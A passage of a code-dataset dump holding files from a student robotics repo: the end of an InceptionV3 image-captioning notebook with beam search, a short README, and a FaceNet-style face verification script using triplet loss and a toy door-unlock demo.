steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.save_weights('time_inceptionV3_3.15_loss.h5')\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=samples_per_epoch, epochs=1, verbose=2)\n\nfinal_model.load_weights('time_inceptionV3_1.5987_loss.h5')\n\n\ndef predict_captions(image):\n start_word = [\"<start>\"]\n while True:\n par_caps = [word2idx[i] for i in start_word]\n par_caps = sequence.pad_sequences([par_caps], maxlen=max_len, padding='post')\n e = encoding_test[image[len(images):]]\n preds = final_model.predict([np.array([e]), np.array(par_caps)])\n word_pred = idx2word[np.argmax(preds[0])]\n start_word.append(word_pred)\n \n if word_pred == \"<end>\" or len(start_word) > max_len:\n break\n \n return ' '.join(start_word[1:-1])\n\ndef beam_search_predictions(image, beam_index = 3):\n start = [word2idx[\"<start>\"]]\n \n start_word = [[start, 0.0]]\n \n while len(start_word[0][0]) < max_len:\n temp = []\n for s in start_word:\n par_caps = sequence.pad_sequences([s[0]], maxlen=max_len, padding='post')\n e = encoding_test[image[len(images):]]\n preds = final_model.predict([np.array([e]), np.array(par_caps)])\n \n word_preds = np.argsort(preds[0])[-beam_index:]\n \n for w in word_preds:\n next_cap, prob = s[0][:], s[1]\n next_cap.append(w)\n prob += preds[0][w]\n temp.append([next_cap, prob])\n \n start_word = temp\n start_word = sorted(start_word, reverse=False, key=lambda l: l[1])\n start_word = start_word[-beam_index:]\n \n start_word = start_word[-1][0]\n intermediate_caption = [idx2word[i] for i in start_word]\n\n final_caption = []\n \n for i in intermediate_caption:\n if i != '<end>':\n final_caption.append(i)\n else:\n break\n \n final_caption = ' '.join(final_caption[1:])\n return final_caption\n\ntry_image = test_img[0]\nImage.open(try_image)\n\nprint ('Normal Max search:', predict_captions(try_image)) \nprint ('Beam Search, k=3:', beam_search_predictions(try_image, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(try_image, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(try_image, beam_index=7))\n\n\n\ntry_image2 = test_img[7]\nImage.open(try_image2)\n\nprint ('Normal Max search:', predict_captions(try_image2)) \nprint ('Beam Search, k=3:', beam_search_predictions(try_image2, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(try_image2, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(try_image2, beam_index=7))\n\n\n\ntry_image3 = test_img[851]\nImage.open(try_image3)\n\nprint ('Normal Max search:', predict_captions(try_image3)) \nprint ('Beam Search, k=3:', beam_search_predictions(try_image3, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(try_image3, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(try_image3, beam_index=7))\n\n\n\ntry_image4 = 'Flickr8k_Dataset/Flicker8k_Dataset/136552115_6dc3e7231c.jpg'\nprint ('Normal Max search:', predict_captions(try_image4))\nprint ('Beam Search, k=3:', beam_search_predictions(try_image4, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(try_image4, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(try_image4, beam_index=7))\nImage.open(try_image4)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/1674612291_7154c5ab61.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/384577800_fc325af410.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/3631986552_944ea208fc.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/3320032226_63390d74a6.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/3316725440_9ccd9b5417.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/2306674172_dc07c7f847.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/2542662402_d781dd7f7c.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = test_img[int(np.random.randint(0, 1000, size=1))]\nprint (im)\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n"
},
{
"alpha_fraction": 0.6690140962600708,
"alphanum_fraction": 0.7253521084785461,
"avg_line_length": 19.428571701049805,
"blob_id": "2700ee59637a8cf4bd12e1d640b618c02a645478",
"content_id": "0f669011b35a1389afd28920fe1367cf6facb2f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 142,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 7,
"path": "/README.md",
"repo_name": "Riya-tech/ARBIE_2020",
"src_encoding": "UTF-8",
"text": "# ARBIE_2020\nA repo for ARBIE, 2020\n\n## Tracks:\n### Software/ Intelligence\n### Electronics and Motion \n### Mechanical/ Mechanisms for movement"
},
{
"alpha_fraction": 0.5061231851577759,
"alphanum_fraction": 0.5782306790351868,
"avg_line_length": 38.220428466796875,
"blob_id": "eb0958a1991288c1c00ba101b726c1b59c4521ca",
"content_id": "0119a1b2762d7c35e0b93b122c1bf09b3a6d810f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21884,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 558,
"path": "/Software/arbie_facerecognition.py",
"repo_name": "Riya-tech/ARBIE_2020",
"src_encoding": "UTF-8",
"text": "#Unzip the files uploaded \n!unzip -qq weights.zip -d weights\n!unzip -qq datasets.zip -d datasets\n!unzip -qq images.zip -d images\n\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport cv2\nfrom numpy import genfromtxt\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nimport h5py\nimport matplotlib.pyplot as plt\n\n\n_FLOATX = 'float32'\n\ndef variable(value, dtype=_FLOATX, name=None):\n v = tf.Variable(np.asarray(value, dtype=dtype), name=name)\n _get_session().run(v.initializer)\n return v\n\ndef shape(x):\n return x.get_shape()\n\ndef square(x):\n return tf.square(x)\n\ndef zeros(shape, dtype=_FLOATX, name=None):\n return variable(np.zeros(shape), dtype, name)\n\ndef concatenate(tensors, axis=-1):\n if axis < 0:\n axis = axis % len(tensors[0].get_shape())\n return tf.concat(axis, tensors)\n\ndef LRN2D(x):\n return tf.nn.lrn(x, alpha=1e-4, beta=0.75)\n\ndef conv2d_bn(x,\n layer=None,\n cv1_out=None,\n cv1_filter=(1, 1),\n cv1_strides=(1, 1),\n cv2_out=None,\n cv2_filter=(3, 3),\n cv2_strides=(1, 1),\n padding=None):\n num = '' if cv2_out == None else '1'\n tensor = Conv2D(cv1_out, cv1_filter, strides=cv1_strides, data_format='channels_first', name=layer+'_conv'+num)(x)\n tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer+'_bn'+num)(tensor)\n tensor = Activation('relu')(tensor)\n if padding == None:\n return tensor\n tensor = ZeroPadding2D(padding=padding, data_format='channels_first')(tensor)\n if cv2_out == None:\n return tensor\n tensor = Conv2D(cv2_out, cv2_filter, strides=cv2_strides, data_format='channels_first', name=layer+'_conv'+'2')(tensor)\n tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer+'_bn'+'2')(tensor)\n tensor = Activation('relu')(tensor)\n return tensor\n\nWEIGHTS = [\n 'conv1', 'bn1', 'conv2', 'bn2', 'conv3', 'bn3',\n 'inception_3a_1x1_conv', 'inception_3a_1x1_bn',\n 'inception_3a_pool_conv', 'inception_3a_pool_bn',\n 'inception_3a_5x5_conv1', 'inception_3a_5x5_conv2', 'inception_3a_5x5_bn1', 'inception_3a_5x5_bn2',\n 'inception_3a_3x3_conv1', 'inception_3a_3x3_conv2', 'inception_3a_3x3_bn1', 'inception_3a_3x3_bn2',\n 'inception_3b_3x3_conv1', 'inception_3b_3x3_conv2', 'inception_3b_3x3_bn1', 'inception_3b_3x3_bn2',\n 'inception_3b_5x5_conv1', 'inception_3b_5x5_conv2', 'inception_3b_5x5_bn1', 'inception_3b_5x5_bn2',\n 'inception_3b_pool_conv', 'inception_3b_pool_bn',\n 'inception_3b_1x1_conv', 'inception_3b_1x1_bn',\n 'inception_3c_3x3_conv1', 'inception_3c_3x3_conv2', 'inception_3c_3x3_bn1', 'inception_3c_3x3_bn2',\n 'inception_3c_5x5_conv1', 'inception_3c_5x5_conv2', 'inception_3c_5x5_bn1', 'inception_3c_5x5_bn2',\n 'inception_4a_3x3_conv1', 'inception_4a_3x3_conv2', 'inception_4a_3x3_bn1', 'inception_4a_3x3_bn2',\n 'inception_4a_5x5_conv1', 'inception_4a_5x5_conv2', 'inception_4a_5x5_bn1', 'inception_4a_5x5_bn2',\n 'inception_4a_pool_conv', 'inception_4a_pool_bn',\n 'inception_4a_1x1_conv', 'inception_4a_1x1_bn',\n 'inception_4e_3x3_conv1', 'inception_4e_3x3_conv2', 'inception_4e_3x3_bn1', 'inception_4e_3x3_bn2',\n 'inception_4e_5x5_conv1', 'inception_4e_5x5_conv2', 'inception_4e_5x5_bn1', 'inception_4e_5x5_bn2',\n 'inception_5a_3x3_conv1', 'inception_5a_3x3_conv2', 'inception_5a_3x3_bn1', 'inception_5a_3x3_bn2',\n 'inception_5a_pool_conv', 'inception_5a_pool_bn',\n 'inception_5a_1x1_conv', 'inception_5a_1x1_bn',\n 'inception_5b_3x3_conv1', 'inception_5b_3x3_conv2', 'inception_5b_3x3_bn1', 'inception_5b_3x3_bn2',\n 'inception_5b_pool_conv', 'inception_5b_pool_bn',\n 'inception_5b_1x1_conv', 'inception_5b_1x1_bn',\n 'dense_layer'\n]\n\nconv_shape = {\n 'conv1': [64, 3, 7, 7],\n 'conv2': [64, 64, 1, 1],\n 'conv3': [192, 64, 3, 3],\n 'inception_3a_1x1_conv': [64, 192, 1, 1],\n 'inception_3a_pool_conv': [32, 192, 1, 1],\n 'inception_3a_5x5_conv1': [16, 192, 1, 1],\n 'inception_3a_5x5_conv2': [32, 16, 5, 5],\n 'inception_3a_3x3_conv1': [96, 192, 1, 1],\n 'inception_3a_3x3_conv2': [128, 96, 3, 3],\n 'inception_3b_3x3_conv1': [96, 256, 1, 1],\n 'inception_3b_3x3_conv2': [128, 96, 3, 3],\n 'inception_3b_5x5_conv1': [32, 256, 1, 1],\n 'inception_3b_5x5_conv2': [64, 32, 5, 5],\n 'inception_3b_pool_conv': [64, 256, 1, 1],\n 'inception_3b_1x1_conv': [64, 256, 1, 1],\n 'inception_3c_3x3_conv1': [128, 320, 1, 1],\n 'inception_3c_3x3_conv2': [256, 128, 3, 3],\n 'inception_3c_5x5_conv1': [32, 320, 1, 1],\n 'inception_3c_5x5_conv2': [64, 32, 5, 5],\n 'inception_4a_3x3_conv1': [96, 640, 1, 1],\n 'inception_4a_3x3_conv2': [192, 96, 3, 3],\n 'inception_4a_5x5_conv1': [32, 640, 1, 1,],\n 'inception_4a_5x5_conv2': [64, 32, 5, 5],\n 'inception_4a_pool_conv': [128, 640, 1, 1],\n 'inception_4a_1x1_conv': [256, 640, 1, 1],\n 'inception_4e_3x3_conv1': [160, 640, 1, 1],\n 'inception_4e_3x3_conv2': [256, 160, 3, 3],\n 'inception_4e_5x5_conv1': [64, 640, 1, 1],\n 'inception_4e_5x5_conv2': [128, 64, 5, 5],\n 'inception_5a_3x3_conv1': [96, 1024, 1, 1],\n 'inception_5a_3x3_conv2': [384, 96, 3, 3],\n 'inception_5a_pool_conv': [96, 1024, 1, 1],\n 'inception_5a_1x1_conv': [256, 1024, 1, 1],\n 'inception_5b_3x3_conv1': [96, 736, 1, 1],\n 'inception_5b_3x3_conv2': [384, 96, 3, 3],\n 'inception_5b_pool_conv': [96, 736, 1, 1],\n 'inception_5b_1x1_conv': [256, 736, 1, 1],\n}\n\ndef load_weights_from_FaceNet(FRmodel):\n weights = WEIGHTS\n weights_dict = load_weights()\n\n for name in weights:\n if FRmodel.get_layer(name) != None:\n FRmodel.get_layer(name).set_weights(weights_dict[name])\n elif model.get_layer(name) != None:\n model.get_layer(name).set_weights(weights_dict[name])\n\ndef load_weights():\n dirPath = './weights'\n fileNames = filter(lambda f: not f.startswith('.'), os.listdir(dirPath))\n paths = {}\n weights_dict = {}\n\n for n in fileNames:\n paths[n.replace('.csv', '')] = dirPath + '/' + n\n\n for name in WEIGHTS:\n if 'conv' in name:\n conv_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)\n conv_w = np.reshape(conv_w, conv_shape[name])\n conv_w = np.transpose(conv_w, (2, 3, 1, 0))\n conv_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)\n weights_dict[name] = [conv_w, conv_b] \n elif 'bn' in name:\n bn_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)\n bn_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)\n bn_m = genfromtxt(paths[name + '_m'], delimiter=',', dtype=None)\n bn_v = genfromtxt(paths[name + '_v'], delimiter=',', dtype=None)\n weights_dict[name] = [bn_w, bn_b, bn_m, bn_v]\n elif 'dense' in name:\n dense_w = genfromtxt(dirPath+'/dense_w.csv', delimiter=',', dtype=None)\n dense_w = np.reshape(dense_w, (128, 736))\n dense_w = np.transpose(dense_w, (1, 0))\n dense_b = genfromtxt(dirPath+'/dense_b.csv', delimiter=',', dtype=None)\n weights_dict[name] = [dense_w, dense_b]\n\n return weights_dict\n\n\ndef load_dataset():\n train_dataset = h5py.File('datasets/datasets/train_happy.h5', \"r\")\n train_set_x_orig = np.array(train_dataset[\"train_set_x\"][:]) \n train_set_y_orig = np.array(train_dataset[\"train_set_y\"][:]) \n\n test_dataset = h5py.File('datasets/datasets/test_happy.h5', \"r\")\n test_set_x_orig = np.array(test_dataset[\"test_set_x\"][:])\n test_set_y_orig = np.array(test_dataset[\"test_set_y\"][:]) \n\n classes = np.array(test_dataset[\"list_classes\"][:])\n \n train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))\n test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))\n \n return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n\ndef img_to_encoding(image_path, model):\n img1 = cv2.imread(image_path, 1)\n image = cv2.resize(img1, (96, 96)) \n img = image[...,::-1]\n img = np.around(np.transpose(img, (2,0,1))/255.0, decimals=12)\n x_train = np.array([img])\n embedding = model.predict_on_batch(x_train)\n return embedding\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nfrom numpy import genfromtxt\nfrom keras import backend as K\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nfrom keras.layers.core import Lambda, Flatten, Dense\n\ndef inception_block_1a(X):\n\n \n X_3x3 = Conv2D(96, (1, 1), data_format='channels_first', name ='inception_3a_3x3_conv1')(X)\n X_3x3 = BatchNormalization(axis=1, epsilon=0.00001, name = 'inception_3a_3x3_bn1')(X_3x3)\n X_3x3 = Activation('relu')(X_3x3)\n X_3x3 = ZeroPadding2D(padding=(1, 1), data_format='channels_first')(X_3x3)\n X_3x3 = Conv2D(128, (3, 3), data_format='channels_first', name='inception_3a_3x3_conv2')(X_3x3)\n X_3x3 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_3x3_bn2')(X_3x3)\n X_3x3 = Activation('relu')(X_3x3)\n \n X_5x5 = Conv2D(16, (1, 1), data_format='channels_first', name='inception_3a_5x5_conv1')(X)\n X_5x5 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_5x5_bn1')(X_5x5)\n X_5x5 = Activation('relu')(X_5x5)\n X_5x5 = ZeroPadding2D(padding=(2, 2), data_format='channels_first')(X_5x5)\n X_5x5 = Conv2D(32, (5, 5), data_format='channels_first', name='inception_3a_5x5_conv2')(X_5x5)\n X_5x5 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_5x5_bn2')(X_5x5)\n X_5x5 = Activation('relu')(X_5x5)\n\n X_pool = MaxPooling2D(pool_size=3, strides=2, data_format='channels_first')(X)\n X_pool = Conv2D(32, (1, 1), data_format='channels_first', name='inception_3a_pool_conv')(X_pool)\n X_pool = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_pool_bn')(X_pool)\n X_pool = Activation('relu')(X_pool)\n X_pool = ZeroPadding2D(padding=((3, 4), (3, 4)), data_format='channels_first')(X_pool)\n\n X_1x1 = Conv2D(64, (1, 1), data_format='channels_first', name='inception_3a_1x1_conv')(X)\n X_1x1 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_1x1_bn')(X_1x1)\n X_1x1 = Activation('relu')(X_1x1)\n \n inception = concatenate([X_3x3, X_5x5, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef inception_block_1b(X):\n X_3x3 = Conv2D(96, (1, 1), data_format='channels_first', name='inception_3b_3x3_conv1')(X)\n X_3x3 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_3x3_bn1')(X_3x3)\n X_3x3 = Activation('relu')(X_3x3)\n X_3x3 = ZeroPadding2D(padding=(1, 1), data_format='channels_first')(X_3x3)\n X_3x3 = Conv2D(128, (3, 3), data_format='channels_first', name='inception_3b_3x3_conv2')(X_3x3)\n X_3x3 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_3x3_bn2')(X_3x3)\n X_3x3 = Activation('relu')(X_3x3)\n\n X_5x5 = Conv2D(32, (1, 1), data_format='channels_first', name='inception_3b_5x5_conv1')(X)\n X_5x5 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_5x5_bn1')(X_5x5)\n X_5x5 = Activation('relu')(X_5x5)\n X_5x5 = ZeroPadding2D(padding=(2, 2), data_format='channels_first')(X_5x5)\n X_5x5 = Conv2D(64, (5, 5), data_format='channels_first', name='inception_3b_5x5_conv2')(X_5x5)\n X_5x5 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_5x5_bn2')(X_5x5)\n X_5x5 = Activation('relu')(X_5x5)\n\n X_pool = AveragePooling2D(pool_size=(3, 3), strides=(3, 3), data_format='channels_first')(X)\n X_pool = Conv2D(64, (1, 1), data_format='channels_first', name='inception_3b_pool_conv')(X_pool)\n X_pool = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_pool_bn')(X_pool)\n X_pool = Activation('relu')(X_pool)\n X_pool = ZeroPadding2D(padding=(4, 4), data_format='channels_first')(X_pool)\n\n X_1x1 = Conv2D(64, (1, 1), data_format='channels_first', name='inception_3b_1x1_conv')(X)\n X_1x1 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_1x1_bn')(X_1x1)\n X_1x1 = Activation('relu')(X_1x1)\n\n inception = concatenate([X_3x3, X_5x5, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef inception_block_1c(X):\n X_3x3 = conv2d_bn(X,\n layer='inception_3c_3x3',\n cv1_out=128,\n cv1_filter=(1, 1),\n cv2_out=256,\n cv2_filter=(3, 3),\n cv2_strides=(2, 2),\n padding=(1, 1))\n\n X_5x5 = conv2d_bn(X,\n layer='inception_3c_5x5',\n cv1_out=32,\n cv1_filter=(1, 1),\n cv2_out=64,\n cv2_filter=(5, 5),\n cv2_strides=(2, 2),\n padding=(2, 2))\n\n X_pool = MaxPooling2D(pool_size=3, strides=2, data_format='channels_first')(X)\n X_pool = ZeroPadding2D(padding=((0, 1), (0, 1)), data_format='channels_first')(X_pool)\n\n inception = concatenate([X_3x3, X_5x5, X_pool], axis=1)\n\n return inception\n\ndef inception_block_2a(X):\n X_3x3 = conv2d_bn(X,\n layer='inception_4a_3x3',\n cv1_out=96,\n cv1_filter=(1, 1),\n cv2_out=192,\n cv2_filter=(3, 3),\n cv2_strides=(1, 1),\n padding=(1, 1))\n X_5x5 = conv2d_bn(X,\n layer='inception_4a_5x5',\n cv1_out=32,\n cv1_filter=(1, 1),\n cv2_out=64,\n cv2_filter=(5, 5),\n cv2_strides=(1, 1),\n padding=(2, 2))\n\n X_pool = AveragePooling2D(pool_size=(3, 3), strides=(3, 3), data_format='channels_first')(X)\n X_pool = conv2d_bn(X_pool,\n layer='inception_4a_pool',\n cv1_out=128,\n cv1_filter=(1, 1),\n padding=(2, 2))\n X_1x1 = conv2d_bn(X,\n layer='inception_4a_1x1',\n cv1_out=256,\n cv1_filter=(1, 1))\n inception = concatenate([X_3x3, X_5x5, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef inception_block_2b(X):\n #inception4e\n X_3x3 = conv2d_bn(X,\n layer='inception_4e_3x3',\n cv1_out=160,\n cv1_filter=(1, 1),\n cv2_out=256,\n cv2_filter=(3, 3),\n cv2_strides=(2, 2),\n padding=(1, 1))\n X_5x5 = conv2d_bn(X,\n layer='inception_4e_5x5',\n cv1_out=64,\n cv1_filter=(1, 1),\n cv2_out=128,\n cv2_filter=(5, 5),\n cv2_strides=(2, 2),\n padding=(2, 2))\n \n X_pool = MaxPooling2D(pool_size=3, strides=2, data_format='channels_first')(X)\n X_pool = ZeroPadding2D(padding=((0, 1), (0, 1)), data_format='channels_first')(X_pool)\n\n inception = concatenate([X_3x3, X_5x5, X_pool], axis=1)\n\n return inception\n\ndef inception_block_3a(X):\n X_3x3 = conv2d_bn(X,\n layer='inception_5a_3x3',\n cv1_out=96,\n cv1_filter=(1, 1),\n cv2_out=384,\n cv2_filter=(3, 3),\n cv2_strides=(1, 1),\n padding=(1, 1))\n X_pool = AveragePooling2D(pool_size=(3, 3), strides=(3, 3), data_format='channels_first')(X)\n X_pool = conv2d_bn(X_pool,\n layer='inception_5a_pool',\n cv1_out=96,\n cv1_filter=(1, 1),\n padding=(1, 1))\n X_1x1 = conv2d_bn(X,\n layer='inception_5a_1x1',\n cv1_out=256,\n cv1_filter=(1, 1))\n\n inception = concatenate([X_3x3, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef inception_block_3b(X):\n X_3x3 = conv2d_bn(X,\n layer='inception_5b_3x3',\n cv1_out=96,\n cv1_filter=(1, 1),\n cv2_out=384,\n cv2_filter=(3, 3),\n cv2_strides=(1, 1),\n padding=(1, 1))\n X_pool = MaxPooling2D(pool_size=3, strides=2, data_format='channels_first')(X)\n X_pool = conv2d_bn(X_pool,\n layer='inception_5b_pool',\n cv1_out=96,\n cv1_filter=(1, 1))\n X_pool = ZeroPadding2D(padding=(1, 1), data_format='channels_first')(X_pool)\n\n X_1x1 = conv2d_bn(X,\n layer='inception_5b_1x1',\n cv1_out=256,\n cv1_filter=(1, 1))\n inception = concatenate([X_3x3, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef faceRecoModel(input_shape):\n\n X_input = Input(input_shape)\n\n X = ZeroPadding2D((3, 3))(X_input)\n \n X = Conv2D(64, (7, 7), strides = (2, 2), name = 'conv1')(X)\n X = BatchNormalization(axis = 1, name = 'bn1')(X)\n X = Activation('relu')(X)\n \n X = ZeroPadding2D((1, 1))(X)\n X = MaxPooling2D((3, 3), strides = 2)(X)\n \n X = Conv2D(64, (1, 1), strides = (1, 1), name = 'conv2')(X)\n X = BatchNormalization(axis = 1, epsilon=0.00001, name = 'bn2')(X)\n X = Activation('relu')(X)\n \n X = ZeroPadding2D((1, 1))(X)\n\n X = Conv2D(192, (3, 3), strides = (1, 1), name = 'conv3')(X)\n X = BatchNormalization(axis = 1, epsilon=0.00001, name = 'bn3')(X)\n X = Activation('relu')(X)\n \n X = ZeroPadding2D((1, 1))(X)\n X = MaxPooling2D(pool_size = 3, strides = 2)(X)\n \n X = inception_block_1a(X)\n X = inception_block_1b(X)\n X = inception_block_1c(X)\n \n X = inception_block_2a(X)\n X = inception_block_2b(X)\n \n X = inception_block_3a(X)\n X = inception_block_3b(X)\n \n X = AveragePooling2D(pool_size=(3, 3), strides=(1, 1), data_format='channels_first')(X)\n X = Flatten()(X)\n X = Dense(128, name='dense_layer')(X)\n \n X = Lambda(lambda x: K.l2_normalize(x,axis=1))(X)\n\n model = Model(inputs = X_input, outputs = X, name='FaceRecoModel')\n \n return model\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nfrom keras.layers.merge import Concatenate\nfrom keras.layers.core import Lambda, Flatten, Dense\nfrom keras.initializers import glorot_uniform\nfrom keras.engine.topology import Layer\nfrom keras import backend as K\nK.set_image_data_format('channels_first')\nimport cv2\nimport os\nimport numpy as np\nfrom numpy import genfromtxt\nimport pandas as pd\nimport tensorflow as tf\n\n\nimport sys\nnp.set_printoptions(threshold=sys.maxsize)\n\n\nFRmodel = faceRecoModel(input_shape=(3, 96, 96))\n\nprint(\"Total Params:\", FRmodel.count_params())\n\ndef triplet_loss(y_true, y_pred, alpha = 0.2):\n\n \n anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]\n \n pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)), axis=-1)\n neg_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, negative)), axis=-1)\n basic_loss = tf.subtract(pos_dist, neg_dist) + alpha\n loss = tf.reduce_sum(tf.maximum(basic_loss, 0.0))\n\n return loss\n\nwith tf.compat.v1.Session() as test:\n tf.compat.v1.set_random_seed(1)\n y_true = (None, None, None)\n y_pred = (tf.compat.v1.random_normal([3, 128], mean=6, stddev=0.1, seed = 1),\n tf.compat.v1.random_normal([3, 128], mean=1, stddev=1, seed = 1),\n tf.compat.v1.random_normal([3, 128], mean=3, stddev=4, seed = 1))\n loss = triplet_loss(y_true, y_pred)\n \n print(\"loss = \" + str(loss.eval()))\n\n\nFRmodel.compile(optimizer = 'adam', loss = triplet_loss, metrics = ['accuracy'])\nload_weights_from_FaceNet(FRmodel)\n\n\n\ndatabase = {}\ndatabase[\"federer\"] = img_to_encoding(\"images/images/federer.jpg\", FRmodel)\ndatabase[\"nadal\"] = img_to_encoding(\"images/images/nadal.jpg\", FRmodel)\ndatabase[\"djokovic\"] = img_to_encoding(\"images/images/djokovic.jpg\", FRmodel)\n\n\n\ndef verify(image_path, identity, database, model):\n\n\n encoding = img_to_encoding(image_path, model)\n dist = np.linalg.norm(database[identity] - encoding)\n \n if dist < 0.7:\n print(\"It's \" + str(identity) + \", welcome home!\")\n door_open = True\n else:\n print(\"It's not \" + str(identity) + \", please go away\")\n door_open = False\n \n return dist, door_open\n\n\nverify(\"images/images/camera_2.jpg\", \"nadal\", database, FRmodel)\n\n\nverify(\"images/images/camera_1.jpg\", \"djokovic\", database, FRmodel)\n\n\ndef who_is_it(image_path, database, model):\n\n\n encoding = img_to_encoding(image_path, model)\n min_dist = 100\n \n for (name, db_enc) in database.items():\n dist = np.linalg.norm(db_enc - encoding)\n if dist < min_dist:\n min_dist = dist\n identity = name\n\n if min_dist > 0.7:\n print(\"Not in the database.\")\n else:\n print (\"it's \" + str(identity) + \", the distance is \" + str(min_dist))\n \n return min_dist, identity\n\n\nwho_is_it(\"images/images/camera_3.jpg\", database, FRmodel)"
}
] | 3 |
rneilsen/advent-of-code-2020 | https://github.com/rneilsen/advent-of-code-2020 | 067fcb08a171e00f39a718fe2a56bd57c471f78e | 54ba71c80f6e6c9d5900502126474c338b117bc4 | b44042d103b32358ced619ddfd66d6be0a887486 | refs/heads/main | 2023-02-08T05:40:56.903430 | 2020-12-31T15:24:14 | 2020-12-31T15:24:14 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.46480685472488403,
"alphanum_fraction": 0.4811158776283264,
"avg_line_length": 33.27941131591797,
"blob_id": "6de3403a9649e7d85305e6872e7f161e09492f6a",
